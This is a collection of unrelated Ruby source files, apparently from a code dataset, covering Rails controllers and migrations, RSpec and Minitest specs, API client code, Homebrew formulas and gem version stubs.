        protocol: Zold::PROTOCOL,
        id: wallet.id.to_s,
        score: score.to_h,
        wallets: 1,
        mtime: wallet.mtime.utc.iso8601,
        digest: wallet.digest,
        balance: wallet.balance.to_i,
        body: File.read(wallet.path)
      }.to_json
    end
  end

  # Copies store for +wallet+ under this home.
  def copies(wallet = create_wallet)
    Zold::Copies.new(File.join(@dir, "copies/#{wallet.id}"))
  end

  # Empty (cleaned) remotes list stored under this home.
  def remotes
    remotes = Zold::Remotes.new(file: File.join(@dir, 'secrets/remotes'))
    remotes.clean
    remotes
  end
end
| 32.494505 | 88 | 0.701725 |
6a7e5b55dfab882a17072d8fdea822eb36c18913 | 143 | class ChangePublisherNameFieldToNotNull < ActiveRecord::Migration[7.1]
def change
change_column_null :publishers, :name, false
end
end
| 23.833333 | 70 | 0.79021 |
6acea90197dd5c44f00d3419878fb95cb53453c3 | 362 | # frozen_string_literal: true
# Confirms user accounts via the emailed confirmation token.
class ConfirmationsController < ApplicationController
  def show
    confirmed_user = User.confirm_by_token(params[:confirmation_token])
    # confirm_by_token returns a user record whose errors describe any failure.
    if confirmed_user.errors.empty?
      redirect_to sign_in_path, notice: t("messages.confirmations.confirmed")
    else
      redirect_to root_path, alert: t("messages.confirmations.failure")
    end
  end
end
| 25.857143 | 77 | 0.754144 |
ab5c634ead501bba112fb8b851951c18ed5d2c38 | 602 | # frozen_string_literal: true
require "spec_helper"
ENV["RAILS_ENV"] = "test"
require File.expand_path("../config/environment", __dir__)
# Prevent database truncation if the environment is production.
abort("The Rails environment is running in production mode!") if Rails.env.production?
require "rspec/rails"

ActiveRecord::Migration.maintain_test_schema!
Dir["./spec/support/*.rb"].each { |f| require File.expand_path(f) }

RSpec.configure do |config|
  config.infer_spec_type_from_file_location!
  config.filter_rails_from_backtrace!
  config.use_transactional_fixtures = true

  # Parses the last response body as JSON with symbol keys.
  # Fix: JSON.parse takes :symbolize_names (the original passed the
  # nonexistent :symbolize_keys option, which JSON silently ignores, so the
  # helper returned string keys despite its apparent intent).
  def json_response
    JSON.parse(response.body, symbolize_names: true)
  end
end
| 26.173913 | 86 | 0.777409 |
91d738c5228b6bf4b94c54c6d63d214ce783fe5a | 1,636 | #! /usr/bin/env ruby
require 'spec_helper'
require 'puppet/provider/confine/false'

# Confine::False passes only for values that are exactly false.
# NOTE(review): uses legacy RSpec `.should` syntax and mocha `mock`/`expects`;
# kept as-is to match the suite's conventions.
describe Puppet::Provider::Confine::False do
  it "should be named :false" do
    Puppet::Provider::Confine::False.name.should == :false
  end
  it "should require a value" do
    lambda { Puppet::Provider::Confine.new }.should raise_error(ArgumentError)
  end
  describe "when testing values" do
    before { @confine = Puppet::Provider::Confine::False.new("foo") }
    it "should use the 'pass?' method to test validity" do
      @confine = Puppet::Provider::Confine::False.new("foo")
      @confine.label = "eh"
      @confine.expects(:pass?).with("foo")
      @confine.valid?
    end
    it "should return true if the value is false" do
      @confine.pass?(false).should be_true
    end
    it "should return false if the value is not false" do
      @confine.pass?("else").should be_false
    end
    it "should produce a message that a value is true" do
      @confine = Puppet::Provider::Confine::False.new("foo")
      @confine.message("eh").should be_include("true")
    end
  end
  # Summary counts how many supplied values failed (i.e. were truthy).
  it "should be able to produce a summary with the number of incorrectly true values" do
    confine = Puppet::Provider::Confine::False.new %w{one two three four}
    confine.expects(:pass?).times(4).returns(true).returns(false).returns(true).returns(false)
    confine.summary.should == 2
  end
  it "should summarize multiple instances by summing their summaries" do
    c1 = mock '1', :summary => 1
    c2 = mock '2', :summary => 2
    c3 = mock '3', :summary => 3
    Puppet::Provider::Confine::False.summarize([c1, c2, c3]).should == 6
  end
end
| 30.867925 | 94 | 0.668704 |
61b5a03e4c9070b33b2236fa15ae8ce374e7e6ec | 775 | #!/usr/bin/env ruby
# frozen_string_literal: true

# Example: subscribing to Binance spot websocket streams via EventMachine.
$LOAD_PATH.unshift('./lib')
require 'binance'
require 'eventmachine'
require_relative '../../common'

logger = Common.setup_logger
client = Binance::Spot::WebSocket.new

EM.run do
  # Lifecycle callbacks shared by both subscriptions below.
  onopen = proc { logger.info('connected to server') }
  onmessage = proc { |msg, _type| logger.info(msg) }
  onerror = proc { |e| logger.error(e) }
  onclose = proc { logger.info('connection closed') }

  callbacks = {
    onopen: onopen,
    onmessage: onmessage,
    onerror: onerror,
    onclose: onclose
  }

  # subscribe single stream
  client.subscribe(stream: 'btcusdt@bookTicker', callbacks: callbacks)

  # combined subscribing
  client.subscribe(stream: ['btcusdt@bookTicker', 'btcusdt@miniTicker'], callbacks: callbacks)
end
| 23.484848 | 94 | 0.700645 |
113438055a6daaeeb86bddaee86255dacddca9a8 | 1,435 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/version-3/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
require 'aws-sdk-core'
require 'aws-sigv4'
require_relative 'aws-sdk-cloudfront/types'
require_relative 'aws-sdk-cloudfront/client_api'
require_relative 'aws-sdk-cloudfront/client'
require_relative 'aws-sdk-cloudfront/errors'
require_relative 'aws-sdk-cloudfront/waiters'
require_relative 'aws-sdk-cloudfront/resource'
require_relative 'aws-sdk-cloudfront/customizations'
# This module provides support for Amazon CloudFront. This module is available in the
# `aws-sdk-cloudfront` gem.
#
# # Client
#
# The {Client} class provides one method for each API operation. Operation
# methods each accept a hash of request parameters and return a response
# structure.
#
# cloud_front = Aws::CloudFront::Client.new
# resp = cloud_front.associate_alias(params)
#
# See {Client} for more information.
#
# # Errors
#
# Errors returned from Amazon CloudFront are defined in the
# {Errors} module and all extend {Errors::ServiceError}.
#
# begin
# # do stuff
# rescue Aws::CloudFront::Errors::ServiceError
# # rescues all Amazon CloudFront API errors
# end
#
# See {Errors} for more information.
#
# @!group service
module Aws::CloudFront
  # Version of the aws-sdk-cloudfront gem (generated; see header warning).
  GEM_VERSION = '1.57.0'
end
| 26.090909 | 85 | 0.75122 |
796812794b55b855d3103bbcb581d40bc7330c8b | 59 | module YouTube
# Raised for HTTP-level failures when talking to the YouTube API.
class HTTPError < StandardError
end
end
| 11.8 | 33 | 0.779661 |
bbb3aeb21c9fb445d29f9a26b938db2f9674eb96 | 489 | # use when click to activation link in email
# Activates a user account from the link sent by email
# (GET /account_activation/:id/edit?email=...).
class AccountActivationsController < ApplicationController
  def edit
    account = User.find_by email: params[:email]
    # Valid only for an existing, not-yet-activated user whose activation
    # digest matches the token in the URL.
    if account && !account.activated? && account.authenticated?(:activation, params[:id])
      account.activate
      log_in account
      flash[:success] = t "controller.acc_activation.edit.success"
      redirect_to account
    else
      flash[:danger] = t "controller.acc_activation.edit.danger"
      redirect_to root_url
    end
  end
end
| 30.5625 | 80 | 0.703476 |
1c0e3c3e7cdd3132cfc0683f21335181b2843532 | 311 | #!/usr/bin/env ruby
#
# make sure the namespace is created
#
# Empty namespace stubs; the concrete XOR encoders are loaded by the
# requires that follow and reopen Rex::Encoding::Xor.
module Rex
module Encoding
module Xor
end end end
#
# include the Xor encodings
#
require 'rex/encoding/xor/generic'
require 'rex/encoding/xor/byte'
require 'rex/encoding/xor/word'
require 'rex/encoding/xor/dword'
require 'rex/encoding/xor/qword' | 15.55 | 36 | 0.755627 |
7aa768b52251f57b1e3cfe1c91f163257afbbf81 | 240 | # frozen_string_literal: true
require "test_helper"
# Gem-skeleton smoke tests for RuberDialog.
class RuberDialogTest < Minitest::Test
  def test_that_it_has_a_version_number
    refute_nil ::RuberDialog::VERSION
  end

  # Placeholder generated by the gem scaffold.
  def test_it_does_something_useful
    assert true
  end
end
| 17.142857 | 39 | 0.791667 |
28fbdde6b327058bc4d0ffcb9bc521a8f90a7cd5 | 984 | class GstEditingServices < Formula
  desc "GStreamer Editing Services"
  homepage "https://gstreamer.freedesktop.org/modules/gst-editing-services.html"
  url "https://gstreamer.freedesktop.org/src/gst-editing-services/gstreamer-editing-services-1.14.0.tar.xz"
  sha256 "8d5f90eb532f4cf4aa1466807ef92b05bd1705970d7aabe10066929bbc698d91"
  revision 1

  bottle do
    sha256 "4e2e03a93ce8016174b938050675bde833a48ed73008d8464c8b50de9bd790ad" => :high_sierra
    sha256 "121dfe755996c0aeb88a4c239be99ea1c831e8ab655886418721b4f47588401c" => :sierra
    sha256 "aab3f5d4909908af856a96eafd11087ae775d06b416e6deaf4777d6f738a72d5" => :el_capitan
  end

  depends_on "gstreamer"
  depends_on "gst-plugins-base"

  def install
    # Docs are disabled to avoid gtk-doc/docbook build dependencies.
    system "./configure", "--prefix=#{prefix}",
                          "--disable-gtk-doc",
                          "--disable-docbook"
    system "make"
    system "make", "install"
  end

  test do
    # Smoke test: the CLI launcher runs and reports its version.
    system "#{bin}/ges-launch-1.0", "--ges-version"
  end
end
| 33.931034 | 107 | 0.72561 |
ed04ba2da8c60ae26d4b0d3306bb6aed3af5022d | 1,394 | # Copyright:: Copyright (c) Chef Software Inc.
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
# NOTE: This file is generated by running `rake version` in the top level of
# this repo. Do not edit this manually. Edit the VERSION file and run the rake
# task instead.
# !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
module ChefBin
  # Absolute path two directories above this file — presumably the root of
  # the chef-bin gem checkout (TODO confirm against the gem layout).
  CHEFBIN_ROOT = File.expand_path("../..", __FILE__)
  # Gem version string. Maintained by `rake version` from the VERSION file
  # (see the generated-file banner above) — never edit by hand.
  VERSION = "16.2.80".freeze
end
#
# NOTE: the Chef::Version class is defined in version_class.rb
#
# NOTE: DO NOT Use the Chef::Version class on ChefConfig::VERSIONs. The
# Chef::Version class is for _cookbooks_ only, and cannot handle
# pre-release versions like "10.14.0.rc.2". Please use Rubygem's
# Gem::Version class instead.
#
| 39.828571 | 81 | 0.645624 |
bf36b1d42372e5d191ec4401b011040f85c42fb4 | 880 | $: << File.expand_path(File.dirname(__FILE__) + '/../lib')
require 'chargify_api_ares'
# You could load your credentials from a file...
chargify_config = YAML::load_file(File.join(File.dirname(__FILE__), '..', 'chargify.yml'))
Chargify.configure do |c|
c.subdomain = chargify_config['subdomain']
c.api_key = chargify_config['api_key']
end
# Fetch list of subscriptions
subscriptions = Chargify::Subscription.find(:all)
# Grab the first id
id = subscriptions.first.id
# Fetch a preview of the next renewal
preview = Chargify::Renewal::Preview.create(
:subscription_id => id,
)
# The next assessment date
puts preview.next_assessment_at
# The existing balance
puts preview.existing_balance_in_cents
# The total charges for the next renwal
puts preview.total_in_cents
# The total total amount due (existing balance + total)
puts preview.total_amount_due_in_cents
| 23.783784 | 90 | 0.760227 |
617eb288692c7096d817d806e094af405e094e50 | 6,694 | require 'forwardable'
require 'typhoeus'
require 'filemaker/configuration'
module Filemaker
  # HTTP gateway to a FileMaker Server XML Web Publishing endpoint.
  # Holds the connection configuration, exposes the database store, and
  # performs the actual Typhoeus POST requests for API actions.
  class Server
    extend Forwardable
    # @return [Filemaker::Store::DatabaseStore] the database store
    attr_reader :databases
    alias database databases
    alias db databases
    # Surface configuration values directly on the server object.
    def_delegators :@config, :host, :url, :endpoint, :log
    def_delegators :@config, :account_name, :password
    def_delegators :@config, :ssl_verifypeer, :ssl_verifyhost, :ssl, :timeout
    # Builds a server from a mandatory configuration block.
    #
    # @yield [Filemaker::Configuration] the configuration to populate
    # @raise [ArgumentError] if no block was given or the configuration is
    #   still incomplete afterwards (Configuration#not_configurable?)
    def initialize
      @config = Configuration.new
      yield @config if block_given?
      raise ArgumentError, 'Missing config block' if @config.not_configurable?
      @databases = Store::DatabaseStore.new(self)
    end
    # @api private
    # Mostly used by Filemaker::Api
    # TODO: There must be tracing/instrumentation. CURL etc.
    # Or performance metrics?
    # Also we want to pass in timeout option so we can ignore timeout for really
    # long requests
    #
    # Serializes +args+ and +options+ into form parameters, appends the bare
    # action flag (e.g. "-find" => ""), POSTs them, and maps the HTTP status
    # onto library-specific exceptions.
    #
    # @param action [String] FileMaker action flag, e.g. '-find'
    # @param args [Hash, nil] query arguments (values are serialized to String)
    # @param options [Hash] high-level options expanded by #expand_options
    # @return [Array] response and request params Hash
    # @raise [Errors::AuthenticationError] on HTTP 401
    # @raise [Errors::HttpTimeoutError] when libcurl reports a timeout
    # @raise [Errors::CommunicationError] on any other non-200 outcome
    def perform_request(action, args, options = {})
      params = serialize_args(args)
               .merge(expand_options(options))
               .merge({ action => '' })
      # Serialize the params for submission??
      params.stringify_keys!
      log_action(params)
      # yield params if block_given?
      response = get_typhoeus_connection(params)
      # e.g. "200:ok" — combines HTTP code with libcurl's return code.
      http_status = "#{response.response_code}:#{response.return_code}"
      case response.response_code
      when 200
        [response, params]
      when 401
        raise Errors::AuthenticationError,
              "[#{http_status}] Authentication failed."
      when 0
        # Response code 0 means no HTTP response at all; distinguish a
        # libcurl timeout from a plain empty response.
        if response.return_code == :operation_timedout
          raise Errors::HttpTimeoutError,
                "[#{http_status}] Current timeout value is #{timeout}"
        else
          raise Errors::CommunicationError,
                "[#{http_status}] Empty response."
        end
      when 404
        raise Errors::CommunicationError,
              "[#{http_status}] Not found"
      when 302
        raise Errors::CommunicationError,
              "[#{http_status}] Redirect not supported"
      when 502
        raise Errors::CommunicationError,
              "[#{http_status}] Bad gateway. Too many records."
      else
        msg = "Unknown response code = #{http_status}"
        raise Errors::CommunicationError, msg
      end
    end
    # NOTE(review): @connection is never assigned anywhere in this class —
    # this looks like dead code left over from a Faraday-based implementation
    # (the class now uses Typhoeus). Calling it raises NoMethodError on nil;
    # confirm whether it can be removed.
    def handler_names
      @connection.builder.handlers.map(&:name)
    end
    private
    # Builds and immediately runs a Typhoeus POST with HTTP basic auth taken
    # from the configuration. Despite the name, this performs the request.
    #
    # @param body [Hash] stringified form parameters
    # @return [Typhoeus::Response]
    def get_typhoeus_connection(body)
      request = Typhoeus::Request.new(
        "#{url}#{endpoint}",
        method: :post,
        ssl_verifypeer: ssl_verifypeer,
        ssl_verifyhost: ssl_verifyhost,
        userpwd: "#{account_name}:#{password}",
        body: body,
        # Typhoeus treats 0 as "no timeout".
        timeout: timeout || 0
      )
      request.run
    end
    # {"-db"=>"mydb", "-lay"=>"mylay", "email"=>"[email protected]", "updated_at": Date}
    # Take Ruby type and serialize into a form FileMaker can understand
    #
    # Dates/times become FileMaker's US-style formats; everything else is
    # stringified. NOTE(review): this mutates the caller's hash in place —
    # confirm no caller relies on keeping the original values.
    #
    # @param args [Hash, nil]
    # @return [Hash] the same hash with all values serialized to String
    def serialize_args(args)
      return {} if args.nil?
      args.each do |key, value|
        case value
        when DateTime, Time
          args[key] = value.strftime('%m/%d/%Y %H:%M:%S')
        when Date
          args[key] = value.strftime('%m/%d/%Y')
        else
          # Especially for range operator (...), we want to output as String
          args[key] = value.to_s
        end
      end
      args
    end
    # Expands high-level option keys (:max, :skip, :sortfield, scripts, …)
    # into FileMaker's dash-prefixed form parameters. Unrecognized keys are
    # silently ignored.
    #
    # @param options [Hash]
    # @return [Hash] FileMaker-style parameters, e.g. {'-max' => 10}
    def expand_options(options)
      expanded = {}
      options.each do |key, value|
        case key
        when :max
          expanded['-max'] = value
        when :skip
          expanded['-skip'] = value
        when :sortfield
          # FileMaker supports at most 9 sort fields (-sortfield.1 … .9).
          if value.is_a? Array
            msg = 'Too many sortfield, limit=9'
            raise(Filemaker::Errors::ParameterError, msg) if value.size > 9
            value.each_index do |index|
              expanded["-sortfield.#{index + 1}"] = value[index]
            end
          else
            expanded['-sortfield.1'] = value
          end
        when :sortorder
          if value.is_a? Array
            # Use :sortfield as single source of truth for array size
            msg = 'Too many sortorder, limit=9'
            raise(Filemaker::Errors::ParameterError, msg) if value.size > 9
            options[:sortfield].each_index do |index|
              expanded["-sortorder.#{index + 1}"] = value[index] || 'ascend'
            end
          else
            expanded['-sortorder.1'] = value
          end
        when :lay_response
          expanded['-lay.response'] = value
        when :lop
          expanded['-lop'] = value
        when :modid
          expanded['-modid'] = value
        when :relatedsets_filter
          expanded['-relatedsets.filter'] = value
        when :relatedsets_max
          expanded['-relatedsets.max'] = value
        when :delete_related
          expanded['-delete.related'] = value
        when :script
          # A two-element array is [script_name, script_param].
          if value.is_a? Array
            expanded['-script'] = value[0]
            expanded['-script.param'] = value[1]
          else
            expanded['-script'] = value
          end
        when :script_prefind
          if value.is_a? Array
            expanded['-script.prefind'] = value[0]
            expanded['-script.prefind.param'] = value[1]
          else
            expanded['-script.prefind'] = value
          end
        when :script_presort
          if value.is_a? Array
            expanded['-script.presort'] = value[0]
            expanded['-script.presort.param'] = value[1]
          else
            expanded['-script.presort'] = value
          end
        end
      end
      expanded
    end
    # TODO: Should we convert it to string so 'cURL' will work also?
    # Dispatches request logging to STDERR according to the configured
    # log mode ('simple', 'curl' or 'curl_auth'); any other value is silent.
    def log_action(params)
      case @config.log.to_s
      when 'simple' then log_simple(params)
      when 'curl' then log_curl(params)
      when 'curl_auth' then log_curl(params, true)
      end
    end
    # Prints a copy-pasteable curl command for the request; credentials are
    # shown filtered and only when has_auth is true.
    def log_curl(params, has_auth = false)
      full_url = "#{url}#{endpoint}?#{log_params(params)}"
      curl_ssl_option = ''
      auth = ''
      curl_ssl_option = ' -k' unless ssl_verifypeer
      auth = " -u #{account_name}:[FILTERED]" if has_auth
      # warn 'Pretty print like so: `curl XXX | xmllint --format -`'
      warn "curl -XGET '#{full_url}'#{curl_ssl_option} -i#{auth}"
    end
    # Prints the full request URL highlighted with an ANSI truecolor
    # background (may render oddly on terminals without truecolor support).
    def log_simple(params)
      warn colorize('48;2;0;0;255', "#{url}#{endpoint}?#{log_params(params)}")
    end
    # URL-encodes params into a query string.
    def log_params(params)
      params.map do |key, value|
        "#{CGI.escape(key.to_s)}=#{CGI.escape(value.to_s)}"
      end.join('&')
    end
    # Wraps message in the given ANSI SGR escape sequence.
    def colorize(color, message)
      "\e[#{color}m#{message}\e[0m"
    end
  end
end
| 29.883929 | 80 | 0.578428 |
d52e651d17ef740eaa4d2ba856dea2b7eaea727f | 1,465 | # encoding: utf-8
require_relative "../spec_helper"
require "logstash/outputs/s3"
require "logstash/codecs/line"
require "stud/temporary"
describe "Upload current file on shutdown", :integration => true do
include_context "setup plugin"
let(:options) { main_options }
let(:size_file) { 1000000 }
let(:time_file) { 100000 }
let(:number_of_events) { 5000 }
let(:batch_size) { 125 }
let(:event_encoded) { "Hello world" }
let(:batch) do
b = {}
number_of_events.times do
event = LogStash::Event.new({ "message" => event_encoded })
b[event] = "#{event_encoded}\n"
end
b
end
before do
clean_remote_files(prefix)
subject.register
subject.multi_receive_encoded(batch)
subject.close
end
it "creates a specific quantity of files" do
# Since we have really big value of time_file and size_file
expect(bucket_resource.objects(:prefix => prefix).count).to eq(1)
end
it "Persists all events" do
download_directory = Stud::Temporary.pathname
FileUtils.rm_rf(download_directory)
FileUtils.mkdir_p(download_directory)
counter = 0
bucket_resource.objects(:prefix => prefix).each do |object|
target = File.join(download_directory, "#{counter}.txt")
object.get(:response_target => target)
counter += 1
end
expect(Dir.glob(File.join(download_directory, "**", "*.txt")).inject(0) { |sum, f| sum + IO.readlines(f).size }).to eq(number_of_events)
end
end
| 28.173077 | 140 | 0.685324 |
ff7525438fdec53132eb1a45ffa176bab6fa80b9 | 206 | require File.expand_path('../fixtures/classes', __FILE__)
describe "Singleton#clone" do
it "is prevented" do
lambda { SingletonSpecs::MyClass.instance.clone }.should raise_error(TypeError)
end
end
| 25.75 | 83 | 0.757282 |
f800ccdf3fd321b75aeacda8aa8aa89f25496099 | 1,415 | class AddProduct < ActiveRecord::Migration[6.0]
def change
Product.create :title => "Ассам цветок весны",
:description => "Полностью ферментированный индийский черный чай из крупных цельных листьев. Рекомендован к употреблению в первой половине дня - бодрит и тонизирует. Сочетается с молоком и сахаром.",
:price => 651,
:weigth => "250 г.",
:is_china => false,
:is_india => true,
:is_best_offer => false,
:path_to_image => '/images/assam_cvetok_vesni.jpg'
Product.create :title => "Ассам мокалбари",
:description => "Черный индийский чай высшего качества. Произведен на небольшой плантации Мокалбари, которая принадлежит семье потомственных чаепроизводителей. Состоит из среднего цельного листа, обладает высоким содержанием типсов. Сочетается с молоком, сахаром и медом.",
:price => 1222,
:weigth => "250 г.",
:is_china => false,
:is_india => true,
:is_best_offer => true,
:path_to_image => '/images/assam_mokalbari.jpg'
Product.create :title => "Кимун",
:description => "Китайский красный чай, его также называют «цихун». Данный сорт неизменно входит в список Десять Знаменитых Чаев Китая, а также является любимым сортом британской королевской семьи. Недаром он получили эпитет «Император красных чаёв».",
:price => 1308,
:weigth => "250 г.",
:is_china => true,
:is_india => false,
:is_best_offer => false,
:path_to_image => '/images/kimun.jpg'
end
end
| 42.878788 | 275 | 0.725088 |
3361a823e885a609b1c0d650956b822f38c6c23c | 73 | # frozen_string_literal: true
module Kubo
VERSION = "0.0.2.pre.1"
end
| 12.166667 | 29 | 0.712329 |
6a8fd883b9a7e028e44d79b1ffbeb945fb8f389f | 1,323 | require_relative '../../version2_0'
require_relative '../../relationship'
module BELParser
  module Language
    module Version2_0
      module Relationships
        # The (deprecated) +prognosticBiomarkerFor+ BEL relationship: for a
        # term A and process term P, +A prognosticBiomarkerFor P+ states that
        # changes in (or detection of) A serve as a prognostic biomarker for
        # the subsequent development of the pathology or process P.
        class PrognosticBiomarkerFor
          extend Relationship

          SHORT = :prognosticBiomarkerFor
          LONG = :prognosticBiomarkerFor
          DESCRIPTION = <<-DOC
            PrognosticBiomarkerFor: +A prognosticBiomarkerFor P+ -
            For term A and process term P, +A prognosticBiomarkerFor P+
            indicates that changes in or detection of A is used in some
            way to be a prognostic biomarker for the subsequent development
            of pathology or biological process P.
          DOC

          class << self
            # @return [Symbol] abbreviated relationship name
            def short
              SHORT
            end

            # @return [Symbol] full relationship name
            def long
              LONG
            end

            # @return [String] human-readable relationship description
            def description
              DESCRIPTION
            end

            # @return [true] this relationship is deprecated
            def deprecated?
              true
            end

            # @return [true] the relationship is directed (A toward P)
            def directed?
              true
            end
          end
        end
      end
    end
  end
end
| 25.941176 | 73 | 0.61678 |
18435476c3d810d6e623703235a66b813e853260 | 67 | class <%= class_name %> < ActiveRecord::Base
acts_as_executor
end | 22.333333 | 44 | 0.746269 |
08a3bf3337bf96c458d288f174d2c9ed56b07162 | 183 | require "great_pretender/config"
require "great_pretender/controller"
require "great_pretender/version"
module GreatPretender
end
require "great_pretender/engine" if defined? Rails
| 20.333333 | 50 | 0.84153 |
e871980df0b6d8de51c307726009e8a961275d7a | 347 | # frozen_string_literal: true
class FakeUserModel
def self.finder
end
end
class FakeController
include Keycard::ControllerMethods
attr_reader :request, :notary, :session
def initialize(request, session, notary)
@request = request
@session = session
@notary = notary
end
def reset_session
session.clear
end
end
| 15.086957 | 42 | 0.729107 |
ac8cd8a41b8974d3f0ab790d39cee1a1892d46e0 | 1,373 | module Pixiebox
class System
include Utils::Visitable
include Utils::Output
attr_reader :os
def initialize(os)
@os = os
end
def install
accept(Commands::StartInstall.new)
accept(Commands::GetRootPermission.new)
accept(Commands::DownloadDocker.new)
accept(Commands::InstallDocker.new)
accept(Commands::InstallConfig.new)
accept(Commands::UpdatePackages.new)
accept(Commands::SetupShell.new)
accept(Commands::FinishInstall.new)
accept(Commands::ReloadShell.new)
rescue StandardError => e
display_error e
exit 1
end
def uninstall
accept(Commands::StartUninstall.new)
accept(Commands::RemoveSetupShell.new)
accept(Commands::FinishUninstall.new)
rescue StandardError => e
display_error e
exit 1
end
def start
accept(Commands::Start.new)
rescue StandardError => e
display_error e
exit 1
end
def stop
accept(Commands::Stop.new)
rescue StandardError => e
display_error e
exit 1
end
def restart
accept(Commands::Restart.new)
rescue StandardError => e
display_error e
exit 1
end
def ssh(service)
accept(Commands::SshInstance.new(service))
rescue StandardError => e
display_error e
exit 1
end
end
end
| 19.614286 | 48 | 0.644574 |
1d10a0936fc757999953f932a5e0b1a21c1d7943 | 640 | cask 'zalo' do
version '19.7.1a'
sha256 '04c6734460039851cda69eb9ed9d79bfa57f9e225a8249af88b7b36dfa80080f'
# res-download-pc-te-vnno-zn-3.zadn.vn/mac was verified as official when first introduced to the cask
url "https://res-download-pc-te-vnno-zn-3.zadn.vn/mac/ZaloSetup-#{version}.dmg"
name 'Zalo'
homepage 'https://zalo.me/'
app 'Zalo.app'
zap trash: [
'~/Library/Application Support/Zalo',
'~/Library/Application Support/ZaloPC',
'~/Library/Preferences/com.vng.zalo.*.plist',
'~/Library/Saved Application State/com.vng.zalo.savedState',
]
end
| 33.684211 | 103 | 0.654688 |
e2eed2ee41b216160fc3bfa043ee09a8772904a8 | 38,778 | # frozen_string_literal: true
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Auto-generated by gapic-generator-ruby. DO NOT EDIT!
require "helper"
require "gapic/grpc/service_stub"
require "google/cloud/secrets/v1beta1/service_pb"
require "google/cloud/secrets/v1beta1/service_services_pb"
require "google/cloud/secret_manager/v1beta1/secret_manager_service"
class ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::ClientTest < Minitest::Test
class ClientStub
attr_accessor :call_rpc_count, :requests
def initialize response, operation, &block
@response = response
@operation = operation
@block = block
@call_rpc_count = 0
@requests = []
end
def call_rpc *args, **kwargs
@call_rpc_count += 1
@requests << @block&.call(*args, **kwargs)
yield @response, @operation if block_given?
@response
end
end
def test_list_secrets
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::ListSecretsResponse.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
page_size = 42
page_token = "hello world"
list_secrets_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :list_secrets, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::ListSecretsRequest, request
assert_equal "hello world", request["parent"]
assert_equal 42, request["page_size"]
assert_equal "hello world", request["page_token"]
refute_nil options
end
Gapic::ServiceStub.stub :new, list_secrets_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.list_secrets({ parent: parent, page_size: page_size, page_token: page_token }) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use named arguments
client.list_secrets parent: parent, page_size: page_size, page_token: page_token do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.list_secrets ::Google::Cloud::SecretManager::V1beta1::ListSecretsRequest.new(parent: parent, page_size: page_size, page_token: page_token) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use hash object with options
client.list_secrets({ parent: parent, page_size: page_size, page_token: page_token }, grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Use protobuf object with options
client.list_secrets(::Google::Cloud::SecretManager::V1beta1::ListSecretsRequest.new(parent: parent, page_size: page_size, page_token: page_token), grpc_options) do |response, operation|
assert_kind_of Gapic::PagedEnumerable, response
assert_equal grpc_response, response.response
assert_equal grpc_operation, operation
end
# Verify method calls
assert_equal 5, list_secrets_client_stub.call_rpc_count
end
end
def test_create_secret
# Create GRPC objects.
grpc_response = ::Google::Cloud::SecretManager::V1beta1::Secret.new
grpc_operation = GRPC::ActiveCall::Operation.new nil
grpc_channel = GRPC::Core::Channel.new "localhost:8888", nil, :this_channel_is_insecure
grpc_options = {}
# Create request parameters for a unary method.
parent = "hello world"
secret_id = "hello world"
secret = {}
create_secret_client_stub = ClientStub.new grpc_response, grpc_operation do |name, request, options:|
assert_equal :create_secret, name
assert_kind_of ::Google::Cloud::SecretManager::V1beta1::CreateSecretRequest, request
assert_equal "hello world", request["parent"]
assert_equal "hello world", request["secret_id"]
assert_equal Gapic::Protobuf.coerce({}, to: ::Google::Cloud::SecretManager::V1beta1::Secret), request["secret"]
refute_nil options
end
Gapic::ServiceStub.stub :new, create_secret_client_stub do
# Create client
client = ::Google::Cloud::SecretManager::V1beta1::SecretManagerService::Client.new do |config|
config.credentials = grpc_channel
end
# Use hash object
client.create_secret({ parent: parent, secret_id: secret_id, secret: secret }) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use named arguments
client.create_secret parent: parent, secret_id: secret_id, secret: secret do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use protobuf object
client.create_secret ::Google::Cloud::SecretManager::V1beta1::CreateSecretRequest.new(parent: parent, secret_id: secret_id, secret: secret) do |response, operation|
assert_equal grpc_response, response
assert_equal grpc_operation, operation
end
# Use hash object with options
